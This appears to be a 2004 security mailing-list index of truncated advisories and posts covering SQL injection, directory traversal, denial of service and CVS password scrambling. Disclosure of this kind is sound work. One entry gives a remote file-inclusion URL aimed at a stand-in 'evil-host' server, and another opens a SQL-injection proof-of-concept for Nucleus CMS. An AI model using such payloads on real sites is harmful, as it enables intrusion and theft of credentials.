[ GLSA 200407-20 ] Subversion: Vulnerability in mod_authz_svn
2004-07-26, Joshua J. Berry (condordes gentoo org)

CVS woes: .cvspass
2004-07-26, Chiaki (ishikawa yk rim or jp)
The file revision control system, CVS, stores often used server's password in users .cvspass file. (When we use pserver mode to set up a central repository and access it from remote workstations, that is.) The password is "lightly scrambled" for accidental disclosure to casual reader, but descramb [...]

NucleusCMS 3.01 SQL Injection Vulnerability
2004-07-25, acidbits hotmail com
    #!/usr/bin/php
    <?
    // Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept
    // By aCiDBiTS acidbits (at) hotmail (dot) com 24-July-2004
    //
    // Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application.
    //
    // This Proof of Concept dumps the username and M [...]

ASPRunner Multiple Vulnerabilities
2004-07-26, Ferruh Mavituna (ferruh mavituna com)
ASPRunner Multiple Vulnerabilities
Online URL : http://ferruh.mavituna.com/article/?574
1) SQL Injection; Severity : Moderately Critical
2) Information Disclosure; Severity : Low Critical [...]

QUESTION
2004-07-26, Alex Mega (korund hotmail com)
What is the essence of MS Word bug Microsoft Security Bulletin MS03-035 (Flaw in Microsoft Word Could Enable Macros to Run Automatically (827653) What Word component exactly is vulnerable? There are no details of bug nature, just general info. Does someone know P.O.C. exploit explaining this macro [...]

[ GLSA 200407-19 ] Pavuk: Digest authentication helper buffer overflow
2004-07-26, Kurt Lieber (klieber gentoo org)

Easyins Stadtportal
2004-07-24, Francisco Alisson (dominusvis click21 com br)
Easyins Stadtportal v4 and prior seems to be vulnerable to a code inclusion in index.php
http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com
If anybody could explain it better than me, do it :) I'm not a security master, I'm just trying to learn about it : [...]

MS SMS DOS Proof-of-concept code and Snort sig
2004-07-24, wang readyresponse org
Advisory Name : Microsoft Systems Management Server Remote Denial Of Service Vulnerability
Release Date : 22 July, 2004
Application : Microsoft Systems Management Server (SMS)
Author : MacDefender / SRR Project Group of [...]

eSeSIX Thintune thin client multiple vulnerabilities
2004-07-24, Loss, Dirk (Dirk Loss it-consult net)
eSeSIX Thintune thin client multiple vulnerabilities
IT-Consult, 2004-07-24
Background
Thintune is a series of thin client appliances sold by eSeSIX GmbH, Germany. They offer ICA, RDP, X11 and SSH support based on a customized Linux platform. See http://www.thintune.com for details. [...]

EasyWeb FileManager Directory Traversal
2004-07-24, sullo cirt net (1 reply)
Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.php
Description: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system.
Systems Affected: EasyWeb FileManager 1.0 RC-1
Technical De [...]

LNSA-#2004-0016: Multiple problems in Ethereal 0.10.4 (Jul, 23 2004)
2004-07-23, Vincenzo Ciaglia (ciaglia netwosix org)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Netwosix Linux Security Advisory #2004-0016 <http://www.netwosix.org>
Package name [...]

[security bulletin] SSRT4773 HP-UX xfs and stmkfont remote unauthorized access
2004-07-23, Boren, Rich (SSRT) (rich boren hp com)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
HP SECURITY BULLETIN HPSBUX01061 REVISION: 0
TITLE: SSRT4773 rev.0 HP-UX xfs and stmkfont remote unauthorized access
NOTICE: There are no restrictions for distribution of this Bulletin provided that it remains complete and intact. The informat [...]

FW: [Full-Disclosure] Progress and Challenges
2004-07-23, {tonyFelice} (tony breckcomm com)
This may be of interest to the list.
-----Original Message-----
From: full-disclosure-admin (at) lists.netsys (dot) com [mailto:full-disclosure-admin (at) lists.netsys (dot) com] On Behalf Of John Dowling
Sent: Friday, July 23, 2004 10:06 AM
To: full-disclosure (at) lists.netsys (dot) com
Subject: [Full-Disclosure] Progress and Ch [...]

APC Security Advisory - Denial of Service Vulnerability with PowerChuteBusinessEdition
2004-07-21, security advisory apcc com
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APC Security Advisory - Denial of Service Vulnerability with PowerChute Business Edition
Problem Summary
A non-privileged user could cause a denial of service attack on PowerChute Business Edition servers and agents, preventing authorized us [...]

LNSA-#2004-0015: buffer overflow in samba (Jul, 23 2004)
2004-07-23, Vincenzo Ciaglia (ciaglia netwosix org)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Netwosix Linux Security Advisory #2004-0015 <http://www.netwosix.org>
Package name [...]

eSafe: Could this be exploited?
2004-07-23, Hugo van der Kooij (hvdkooij vanderkooij org) (3 replies)
Hi, I had a bit of a chat with Aladdin support regarding the odd results I had with their network virusscanner (aka: eSafe). (see also: http://www.ealaddin.com/esafe/default.asp) Both as NitroEngine or CVP server they will push as much of 80% to the end-user before they stop a virus. Then they rel [...]

Re: eSafe: Could this be exploited?
2004-07-23, Oliver (at) greyhat (dot) de (Oliver greyhat de)

OpenServer 5.0.7 : Mozilla Multiple issues
2004-07-22, please_reply_to_security sco com
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
SCO Security Advisory
Subject: OpenServer 5.0.7 : Mozilla Multiple issues
Advisory number: SCOSA-2004.8
Issue date: 2004 July 20
Cross reference: sr889065 fz528708 [...]

mi2g attacks "so-called" security sites
2004-07-23, Rob Rosenberger (Rob Vmyths com)
mi2g attacked a number of "so-called" security sites in a 20 July press release. mi2g identified by name the following sites: SecurityFocus, Insecure, Neohapsis, NetSys, e2kSecurity, Der Keiler, gossamer-threads, C4I, VulnWatch, and Landfield. Vmyths will slam mi2g in an upcoming column -- because [...]
Gentoo Linux Security Advisory GLSA 200407-20
http://security.gentoo.org/